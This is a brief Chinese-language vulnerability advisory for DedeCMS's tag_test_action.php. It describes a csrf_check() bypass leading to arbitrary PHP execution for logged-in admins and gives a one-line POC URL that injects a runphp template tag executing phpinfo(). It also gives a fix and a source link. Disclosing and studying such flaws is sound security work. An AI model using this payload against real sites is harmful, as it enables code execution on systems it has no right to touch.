漏洞简介¶
该漏洞的触发文件为 /dede/tag_test_action.php。起因是 csrf_check() 函数的绕过,导致可执行任意代码。
POC¶
http://localhost/后台地址/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}phpinfo();{/dede:field}
利用条件¶
登录后台
解决方案¶
重新实现 csrf_check() 函数
参考来源¶
先知社区:https://xz.aliyun.com/t/2224
FROM:无垠の安全
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论